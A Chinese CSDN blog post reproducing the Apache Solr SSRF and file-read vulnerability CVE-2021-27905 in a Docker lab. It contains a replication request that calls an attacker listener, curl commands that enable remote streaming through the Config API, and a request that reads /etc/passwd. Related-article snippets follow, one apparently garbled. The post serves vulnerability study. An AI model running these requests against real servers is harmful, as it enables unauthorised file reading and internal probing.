Apache Solr SSRF(CVE-2021-27905)

最新推荐文章于 2024-04-04 19:26:43 发布
最新推荐文章于 2024-04-04 19:26:43 发布
阅读量384 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: solr 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/129038503
版权

Apache Solr SSRF(CVE-2021-27905)

0x01 漏洞简介

Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。
该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。

0x02 影响版本

Apache Solr 7.0.0 - 7.7.3

Apache Solr 8.0.0 - 8.8.1

0x03 环境搭建

docker下载运行环境:docker run -d -P vulfocus/solr-cve_2021_27905

访问8983所映射的端口就是网站主页

浏览器访问 http://192.168.237.129:49153,进入 Core Admin,点击 Add Core

点击 Add Core 会发生错误。
根据错误提示里的 new_core 路径

在这里插入图片描述

在终端中输入docker ps查看当前的容器,然后docker exec -it 3ce0b013a405 /bin/bash进入容,复制配置文件到core文件夹 -r:递归复制,用于目录的复制操作
cp -r server/solr/configsets/_default/conf /var/solr/data/new_core

再次进入网页,点击 Add Core ,即可创建成功。环境就到这里创建成功.

环境搭建完成。

0x04 漏洞分析

Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“/replication”)有一个“masterUrl”(也是“leaderUrl”别名)参数,用于指定另一个 Solr core上的另一个 ReplicationHandler 将索引数据复制到本地core。为了防止 SSRF 漏洞,Solr 应该根据它用于“shards”参数的类似配置检查这些参数。攻击者可利用该漏洞,传递特定参数,构造并执行服务端请求伪造,造成攻击者任意读取服务器上的文件,利用该漏洞可造成内网信息探测。

solr 支持配置两个core,分别是主(master)和从(slave),我们可以主动控制让从(slave)去获取主的备份,而master的地址在配置文件可以配置,也允许请求者指定。

这个漏洞需要将本地的Solr作为slave,默认solr就有多个core,这里选定任意一个db

在这里插入图片描述

限制:Solr 必须配置主从模式;受影响的是从(slave)服务器

0x05 漏洞复现

通过访问如下链接,可以看到当前的Core名称。

/solr/admin/cores?indexInfo=false&wt=json

在这里插入图片描述

使用攻击机监听本地端口。

再根据刚获得的Core名称,访问如下链接,即可看到反弹信息。

http://192.168.237.129:49153/solr/new_core/replication?command=fetchindex&masterUrl=http://192.168.237.130:9999

在这里插入图片描述

在这里插入图片描述

结合刚获得的Core名称,访问如下链接,可得到以下该界面。

http://192.168.237.129:49153/solr/new_core/config

在这里插入图片描述

默认情况下,requestDispatcher.requestParsers.enableRemoteStreaming 是关闭的。

因此,首先利用 Config API 打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关。

curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.237.129:49153/solr/new_core/config

curl

-i 查看header头信息
-s 不输出统计信息
-k 使用能忽略证书不受信问题
-X 指定POST请求
-H 添加http请求的标头
-d 用于发送post请求的数据体

在这里插入图片描述

这就便可以进行远程任意文件读取了。

如利用 file协议 获得账户信息:

$ curl -i -s -k 'http://192.168.3.137:5000/solr/new_core/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

在这里插入图片描述

吉吉_大王
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-27905 Apache Solr 服务端请求伪造漏洞复现
m0_56642842的博客
07-01 705
0x00 简介 Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 0x01 漏洞概述 Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“/replication”)有一个“masterUrl”(也是“leaderU
Apache Solr SSRF 漏洞(CVE-2021-27905)复现
锋刃科技的博客
04-16 4257
漏洞概述 Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。 该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 http://archive.apache.org/dist/lucene/sol...
CVE-2021-27905 Apache Solr SSRF漏洞
yyj1781572的博客
04-12 1318
Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。该漏洞是由于Solr默认安装未开启身份验证,攻击者可未授权通过Config API修改配置,导致SSRF和任意文件读取。
vulhub中Apache Solr RemoteStreaming 文件读取与SSRF漏洞复现
最新发布
yougexiaojiuguan的博客
04-04 714
漏洞复现过程的记录
Apache Solr 服务端请求伪造(CVE-2021-27905)
m0_65150886的博客
01-17 439
Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr 8.8.2之前版本存在安全漏洞,在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。1.访问http://ip:port/solr,出现如下页面,开始实验。
(CVE-2021-27905)Apache Solr ssrf 漏洞复现
鸣蜩十四的博客
08-09 1574
简介 Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 漏洞描述 Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“/replication”)有一个“masterUrl”(也是“leaderUrl”别名)参数,用
开源搜索服务 Apache Solr 出现多个高危漏洞
smellycat000的专栏
04-13 487
聚焦源代码安全,网罗国内外最新资讯!开源搜素引擎服务 Apache Solr 公布了三个漏洞及其缓解措施。这三个漏洞是 CVE-2021-27905、CVE-2021-29262和CVE...
Apache Solrsolr-8.11.1-src.tgz)
01-10
Apache Solrsolr-8.11.1-src.tgz)Source release
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1.zip)
01-10
Apache Solrsolr-8.11.1.zip)Binary releases 二进制版本
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
apache-solr-dataimportscheduler-1.0.zip_official54l_solr 5.x定时生成
09-24
solr 5.x定时生成索引依赖jar
Apache Solrsolr-7.7.3.tgz)
02-05
Apache Solrsolr-7.7.3.tgz)Binary releases 二进制版本
Apache Solr RemoteStreaming 文件读取与SSRF漏洞(CVE-2021-27905)
黑白的博客
05-11 1358
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响范围 Apache Solr <= 8.8.1(全版本) 复现过程 这里使用8.1.1版本 使用vulhub /app/vulhub/vulhub-master/shiro/CVE-2020-1957 使用docker启动 docker-compose build docker-compose u
Apache Solr SSRF文件读取漏洞
good good study
04-02 5633
目录 一. 漏洞描述 二. 影响版本 三. 漏洞复现 1. 复现条件 2. windows下搭建漏洞环境 3. 漏洞测试 四. 漏洞检测POC 五. 漏洞修复 一. 漏洞描述 Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。 该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读...
Apache Solr 服务端请求伪造组合利用代码执行漏洞
whoami
04-17 393
Solr拥有出网条件下,有一个官方提供的一个正常功能接口,当requestDispatcher.requestParsers.enableRemoteStreaming参数远程设置为true后,可实现http协议ssrf,netdoc协议目录遍历,file协议读取任意文件,jar协议注入tmp文件。当SolrSolrCloud模式启动时,攻击者可以通过构造恶意的solrconfig.xml文件,组合利用从而执行任意java代码。以 solrcloud 方式部署的机器不出网或添加Solr身份校验。
【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
qq_41703976的博客
03-19 1594
漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json' 再传入文件
cve-2022-23222 复现
04-28
CVE-2022-23222是一个相关于Apache Solr的漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务中断。要复现这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其中查询参数需要包含一个bad中的特殊字符,例如'() {内网IP地址}'; 3. Solr服务将无法识别该特殊字符并将停止响应,此时攻击者便可以利用这个漏洞进行攻击。 需要注意的是,为了成功复现此漏洞,需要具备一定的技术水平。同时,攻击者在进行测试时需要谨慎,以免对目标服务器造成不必要的损失。 为了避免该漏洞对系统造成影响,建议及时更新Solr服务程序,升级至最新版本。如果您发现自己的系统已经受到攻击,应立即断开与互联网的连接,并及时咨询安全专业人员解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值